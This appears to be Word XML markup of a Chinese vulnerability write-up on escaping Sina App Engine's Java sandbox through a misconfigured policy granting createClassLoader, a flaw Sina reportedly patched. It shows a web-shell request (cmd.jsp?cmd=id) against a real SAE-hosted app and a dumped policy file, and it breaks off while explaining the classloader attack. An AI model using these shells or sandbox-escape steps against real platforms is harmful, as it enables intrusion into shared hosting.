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 xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>空虚浪子心</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://www.inbreak.net </w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>微博：</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://t.qq.com/javasecurity</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摘要</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绕过安全沙盒技术，并非只有使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>漏洞才能做。在作者的文章</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SAE</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>云服务安全沙箱绕过》</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(http://www.inbreak.net/archives/389)</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>中提到了一种使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>沙盒漏洞，绕过沙盒的例子。事实上，</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SAE</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>沙盒后，作者把目标已经换成了</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GAE</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，但是这是很郁闷的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>google</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>跟一块铁板似的，作者想了很多办法，都没有搞定它。然而回头一看，作者使用的部分技术，完全是可以再次</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>新浪</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sae</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的，处于这种心态，作者这次利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sae</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>开发人员的沙盒设置失误，又一次</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sae</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>沙盒。</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>此漏洞新浪已修补</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</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正文</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查看沙盒环境</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来到一个沙盒，首先要看看环境，我们放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>上去，看看应用没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>之前的样子，访问</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http://1.cracksae.sinaapp.com/cmd.jsp?cmd=id</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返回：</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:noProof/>
          <w:color w:val="4A630F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5772150" cy="4114800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="http://www.inbreak.net/wp-content/uploads/2012/07/image0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break.net/wp-content/uploads/2012/07/image00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114800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>这样很好，标准的沙盒错误，所以我们再看看</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SAE</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的策略文件，查看策略文件的方式，在作者上篇文章中已经提到，就不再贴代码了，只看结果。</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>访问：</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>http://1.cracksae.sinaapp.com/permission.jsp</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="91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58"/>
      </w:tblGrid>
      <w:tr w:rsidR="00564D2E" w:rsidRPr="00564D2E" w:rsidTr="00564D2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9195"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 xml:space="preserve">start exppermission </w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>policyfile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org.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>eclipse</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jetty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policy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JettyPolicy</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">@4f2d26d2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w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>rdc</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sae</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sina</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com</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cn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CC66CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>3307</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connect,resolve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w.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>rdc</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sae</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sina</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com</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cn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CC66CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>3307</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connect,resolve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555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>这里有很多</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>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r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>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createClassLoader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accessClassInPackage.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>com</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sun</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imageio</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plugins</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png</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modifyThread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accessClassInPackage.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>com</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sun</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imageio</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plugins</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gif</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accessClassInPackage.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>sun</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reflect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accessClassInPackage.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>com</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sun</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imageio</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plugins</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jpeg</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getProperty.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>ssl</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="555555"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w: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insertProvider.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>SunJCE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putProviderProperty.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>SunJCE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suppressAccessChecks</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data1</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jetty_work</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CC66CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>908</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bypasssae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usr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java</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packages</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lib</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ext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jar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file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data1</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jetty_work</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template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xhtml</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theme.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>properties</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template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simple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theme.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>properties</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usr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local</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sae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jetty</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usr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java</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jdk1.6.0_33</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jre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usr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local</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sae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jetty</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lib</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template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ajax</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theme.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>properties</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usr</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java</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jdk1.6.0_27</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jre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ab/>
              <w:t>name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velocity.</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="006633"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>log</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action</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read,write</w:t>
            </w:r>
            <w:r w:rsidRPr="00564D2E">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="339933"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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lastRenderedPageBreak/>
        <w:t>看到里面有：</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name:|createClassLoader|action:||</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而关于这个权限，</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>官方是这样说明的：</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createClassLoader: This target grants permission to create a class loader. Granting this permission might allow a malicious application to instantiate its own class loader and load harmful classes into the system. Once loaded, the class loader could place these classes into any protection domain and give them full permissions for that domain.</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就是说，这个权限，是很危险的，攻击者可以自己定义一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Myclassloader</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D2E">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
